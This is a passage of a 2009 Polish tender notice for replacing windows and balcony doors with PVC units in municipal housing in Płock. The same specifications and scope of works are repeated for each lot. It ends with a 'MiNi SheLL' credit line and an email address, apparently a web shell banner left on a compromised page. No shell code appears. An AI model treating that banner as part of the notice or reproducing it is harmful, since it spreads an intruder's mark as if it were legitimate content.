Łącznie 225 okien i 35 drzwi balkonowych.
Wyrób powinien być dopuszczony do obrotu w budownictwie (profil oraz wszystkie elementy składowe).
Stolarkę należy wykonać z wysokoudarowego, wzmocnionego PCV, ostatecznie wykończoną w kolorze białym. Profil okien 5-cio komorowy, niepocieniony, okucia obwiedniowe, spełniające wymagania Polskich Norm i aprobat z możliwością mikrowentylacji przy zamkniętym skrzydle. Grubość skrzydła min. 70 mm, wzmocnienia stalowe o grubości min. 1,5 mm o przekroju ceowym, grubość ramy min. 70 mm, wzmocnienie ramy stalowe o grubości min. 1,5 mm o przekroju prostokątnym. Stolarka powinna posiadać współczynnik infiltracji powietrza a=0,5-1,0 oraz być wyposażona w uszczelki przylgowe typ EPD 11, równoważne lub wyższej klasy, na całym obwodzie okna odpowiadające normom Producenta. Okna powinny posiadać szyby zespolone o współczynniku min.U=1,1 W )m2K. Część stolarki musi mieć górną ościeżnicę okien i drzwi  balkonowych szerokości 15 cm, zgodnie z zapisami w protokołach typowania.
Stolarka okienna musi posiadać geometrię i sposób otwierania z zachowaniem istniejącego podziału.
Szczegółowy zakres robót oraz schematy stolarki określają załączniki Protokóły typowania robót o numerach od 180 do 209 -załącznik Nr 3 - Część I (ROM I) ,Protokóły typowania robót o numerach od 167 do 178 -załącznik Nr 3a - Część II (ROM III),Protokóły typowania robót o numerach od 142 do 155 i od 157 do 166 -załącznik Nr 3b - Część III (ROM IV ), Protokóły typowania robót o numerach od 142 do 168 -załącznik Nr 3c - Część IV (ROM V) do SIWZ i Przedmiar robót Część I(ROM I) załącznik Nr 4, Przedmiar robót Część II(ROM III) załącznik Nr 4a, Przedmiar robót Część III(ROM IV)  załącznik Nr 4b, Przedmiar robót Część IV(ROM V) załącznik Nr 4c do SIWZ oraz Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część I(ROM I)załącznik Nr 5, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część II (ROM III) załącznik Nr 5a, Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część III (ROM IV) załącznik nr 5b, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część IV (ROM V) załącznik nr 5c,  stanowiące integralną część opisu przedmiotu zamówienia.
Do zakresu robót należą następujące czynności:
- demontaż starych okien i drzwi balkonowych,
-  montaż nowej stolarki PCV,
- demontaż i montaż balustrad balkonowych,
- demontaż istniejących parapetów,
- montaż nowych parapetów z blachy ocynkowanej stalowej,
-  montaż parapetów wewnętrznych wg protokołów typowań,
- montaż nawiewników okiennych wg protokołów typowań,
- uzupełnienie tynków zwykłych kategorii III w ościeżach,
- dwukrotne malowanie farbą emulsyjną tynków w ościeżach.

Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie spowoduje niekorzystnego wpływu na jakość wykonywanych robót i środowisko.
Wykonawca jest zobowiązany usuwać na bieżąco, na własny koszt, wszelkie uszkodzenia i zanieczyszczenia spowodowane przez jego pojazdy na drogach publicznych dojazdach do miejsc wymiany stolarki oraz usuwać na bieżąco elementy pochodzące z rozbiórki.

Powyższe postępowanie dotyczy ROM-I, ROM III, ROM-IV,  ROM-V, gdzie wykonanie wymiany stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z podokiennikami zewnętrznymi i parapetami wewnętrznymi w każdym z nich stanowić będzie  jedną odrębną CZĘŚĆ zamówienia.
Na każdą z nich zawarte będą cztery odrębne niezależne od siebie umowy.  

Uwaga:
Na proponowaną w ofercie stolarkę wymagane są certyfikaty, atesty oraz Aprobata Techniczna (nie sam aneks do aprobaty) załączona do oferty oraz Deklaracja zgodności wystawiona przez producenta przedłożona przed odbiorem robót.
Na całość wykonanych prac wymaga się minimum 60 - miesięcznej  gwarancji producenta..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ROM IV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i parapetami wewnętrznymi (zgodnie z protokołami typowania) oraz w części stolarki montaż nawiewników(zgodnie z protokołami typowania) w lokalach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują cztery Rejony Obsługi Mieszkańców tj.: ROM-I, ROM-III, ROM-IV i ROM-V. Każdy z ROM-ów administruje budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia.
Ilość stolarki okiennej i drzwi balkonowych do wymiany z podziałem na Rejony Obsługi Mieszkańców zwanych dalej  ROM:
1. Część I (ROM I) 	- 69 okien i 10 drzwi balkonowych
2. Część II (ROM III) 	- 27okien i 6 drzwi balkonowych
3. Część III (ROM IV)	- 66  okien i 12 drzwi balkonowych
4. Część IV (ROM V)	- 63 okien i 7 drzwi balkonowych	
Łącznie 225 okien i 35 drzwi balkonowych.
Wyrób powinien być dopuszczony do obrotu w budownictwie (profil oraz wszystkie elementy składowe).
Stolarkę należy wykonać z wysokoudarowego, wzmocnionego PCV, ostatecznie wykończoną w kolorze białym. Profil okien 5-cio komorowy, niepocieniony, okucia obwiedniowe, spełniające wymagania Polskich Norm i aprobat z możliwością mikrowentylacji przy zamkniętym skrzydle. Grubość skrzydła min. 70 mm, wzmocnienia stalowe o grubości min. 1,5 mm o przekroju ceowym, grubość ramy min. 70 mm, wzmocnienie ramy stalowe o grubości min. 1,5 mm o przekroju prostokątnym. Stolarka powinna posiadać współczynnik infiltracji powietrza a=0,5-1,0 oraz być wyposażona w uszczelki przylgowe typ EPD 11, równoważne lub wyższej klasy, na całym obwodzie okna odpowiadające normom Producenta. Okna powinny posiadać szyby zespolone o współczynniku min.U=1,1 W )m2K. Część stolarki musi mieć górną ościeżnicę okien i drzwi  balkonowych szerokości 15 cm, zgodnie z zapisami w protokołach typowania.
Stolarka okienna musi posiadać geometrię i sposób otwierania z zachowaniem istniejącego podziału.
Szczegółowy zakres robót oraz schematy stolarki określają załączniki Protokóły typowania robót o numerach od 180 do 209 -załącznik Nr 3 - Część I (ROM I) ,Protokóły typowania robót o numerach od 167 do 178 -załącznik Nr 3a - Część II (ROM III),Protokóły typowania robót o numerach od 142 do 155 i od 157 do 166 -załącznik Nr 3b - Część III (ROM IV ), Protokóły typowania robót o numerach od 142 do 168 -załącznik Nr 3c - Część IV (ROM V) do SIWZ i Przedmiar robót Część I(ROM I) załącznik Nr 4, Przedmiar robót Część II(ROM III) załącznik Nr 4a, Przedmiar robót Część III(ROM IV)  załącznik Nr 4b, Przedmiar robót Część IV(ROM V) załącznik Nr 4c do SIWZ oraz Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część I(ROM I)załącznik Nr 5, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część II (ROM III) załącznik Nr 5a, Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część III (ROM IV) załącznik nr 5b, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część IV (ROM V) załącznik nr 5c,  stanowiące integralną część opisu przedmiotu zamówienia.
Do zakresu robót należą następujące czynności:
- demontaż starych okien i drzwi balkonowych,
-  montaż nowej stolarki PCV,
- demontaż i montaż balustrad balkonowych,
- demontaż istniejących parapetów,
- montaż nowych parapetów z blachy ocynkowanej stalowej,
-  montaż parapetów wewnętrznych wg protokołów typowań,
- montaż nawiewników okiennych wg protokołów typowań,
- uzupełnienie tynków zwykłych kategorii III w ościeżach,
- dwukrotne malowanie farbą emulsyjną tynków w ościeżach.

Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie spowoduje niekorzystnego wpływu na jakość wykonywanych robót i środowisko.
Wykonawca jest zobowiązany usuwać na bieżąco, na własny koszt, wszelkie uszkodzenia i zanieczyszczenia spowodowane przez jego pojazdy na drogach publicznych dojazdach do miejsc wymiany stolarki oraz usuwać na bieżąco elementy pochodzące z rozbiórki.

Powyższe postępowanie dotyczy ROM-I, ROM III, ROM-IV,  ROM-V, gdzie wykonanie wymiany stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z podokiennikami zewnętrznymi i parapetami wewnętrznymi w każdym z nich stanowić będzie  jedną odrębną CZĘŚĆ zamówienia.
Na każdą z nich zawarte będą cztery odrębne niezależne od siebie umowy.  

Uwaga:
Na proponowaną w ofercie stolarkę wymagane są certyfikaty, atesty oraz Aprobata Techniczna (nie sam aneks do aprobaty) załączona do oferty oraz Deklaracja zgodności wystawiona przez producenta przedłożona przed odbiorem robót.
Na całość wykonanych prac wymaga się minimum 60 - miesięcznej  gwarancji producenta..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ROM V.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i parapetami wewnętrznymi (zgodnie z protokołami typowania) oraz w części stolarki montaż nawiewników(zgodnie z protokołami typowania) w lokalach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują cztery Rejony Obsługi Mieszkańców tj.: ROM-I, ROM-III, ROM-IV i ROM-V. Każdy z ROM-ów administruje budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia.
Ilość stolarki okiennej i drzwi balkonowych do wymiany z podziałem na Rejony Obsługi Mieszkańców zwanych dalej  ROM:
1. Część I (ROM I) 	- 69 okien i 10 drzwi balkonowych
2. Część II (ROM III) 	- 27okien i 6 drzwi balkonowych
3. Część III (ROM IV)	- 66  okien i 12 drzwi balkonowych
4. Część IV (ROM V)	- 63 okien i 7 drzwi balkonowych	
Łącznie 225 okien i 35 drzwi balkonowych.
Wyrób powinien być dopuszczony do obrotu w budownictwie (profil oraz wszystkie elementy składowe).
Stolarkę należy wykonać z wysokoudarowego, wzmocnionego PCV, ostatecznie wykończoną w kolorze białym. Profil okien 5-cio komorowy, niepocieniony, okucia obwiedniowe, spełniające wymagania Polskich Norm i aprobat z możliwością mikrowentylacji przy zamkniętym skrzydle. Grubość skrzydła min. 70 mm, wzmocnienia stalowe o grubości min. 1,5 mm o przekroju ceowym, grubość ramy min. 70 mm, wzmocnienie ramy stalowe o grubości min. 1,5 mm o przekroju prostokątnym. Stolarka powinna posiadać współczynnik infiltracji powietrza a=0,5-1,0 oraz być wyposażona w uszczelki przylgowe typ EPD 11, równoważne lub wyższej klasy, na całym obwodzie okna odpowiadające normom Producenta. Okna powinny posiadać szyby zespolone o współczynniku min.U=1,1 W )m2K. Część stolarki musi mieć górną ościeżnicę okien i drzwi  balkonowych szerokości 15 cm, zgodnie z zapisami w protokołach typowania.
Stolarka okienna musi posiadać geometrię i sposób otwierania z zachowaniem istniejącego podziału.
Szczegółowy zakres robót oraz schematy stolarki określają załączniki Protokóły typowania robót o numerach od 180 do 209 -załącznik Nr 3 - Część I (ROM I) ,Protokóły typowania robót o numerach od 167 do 178 -załącznik Nr 3a - Część II (ROM III),Protokóły typowania robót o numerach od 142 do 155 i od 157 do 166 -załącznik Nr 3b - Część III (ROM IV ), Protokóły typowania robót o numerach od 142 do 168 -załącznik Nr 3c - Część IV (ROM V) do SIWZ i Przedmiar robót Część I(ROM I) załącznik Nr 4, Przedmiar robót Część II(ROM III) załącznik Nr 4a, Przedmiar robót Część III(ROM IV)  załącznik Nr 4b, Przedmiar robót Część IV(ROM V) załącznik Nr 4c do SIWZ oraz Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część I(ROM I)załącznik Nr 5, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część II (ROM III) załącznik Nr 5a, Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część III (ROM IV) załącznik nr 5b, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część IV (ROM V) załącznik nr 5c,  stanowiące integralną część opisu przedmiotu zamówienia.
Do zakresu robót należą następujące czynności:
- demontaż starych okien i drzwi balkonowych,
-  montaż nowej stolarki PCV,
- demontaż i montaż balustrad balkonowych,
- demontaż istniejących parapetów,
- montaż nowych parapetów z blachy ocynkowanej stalowej,
-  montaż parapetów wewnętrznych wg protokołów typowań,
- montaż nawiewników okiennych wg protokołów typowań,
- uzupełnienie tynków zwykłych kategorii III w ościeżach,
- dwukrotne malowanie farbą emulsyjną tynków w ościeżach.

Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie spowoduje niekorzystnego wpływu na jakość wykonywanych robót i środowisko.
Wykonawca jest zobowiązany usuwać na bieżąco, na własny koszt, wszelkie uszkodzenia i zanieczyszczenia spowodowane przez jego pojazdy na drogach publicznych dojazdach do miejsc wymiany stolarki oraz usuwać na bieżąco elementy pochodzące z rozbiórki.

Powyższe postępowanie dotyczy ROM-I, ROM III, ROM-IV,  ROM-V, gdzie wykonanie wymiany stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z podokiennikami zewnętrznymi i parapetami wewnętrznymi w każdym z nich stanowić będzie  jedną odrębną CZĘŚĆ zamówienia.
Na każdą z nich zawarte będą cztery odrębne niezależne od siebie umowy.  

Uwaga:
Na proponowaną w ofercie stolarkę wymagane są certyfikaty, atesty oraz Aprobata Techniczna (nie sam aneks do aprobaty) załączona do oferty oraz Deklaracja zgodności wystawiona przez producenta przedłożona przed odbiorem robót.
Na całość wykonanych prac wymaga się minimum 60 - miesięcznej  gwarancji producenta..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com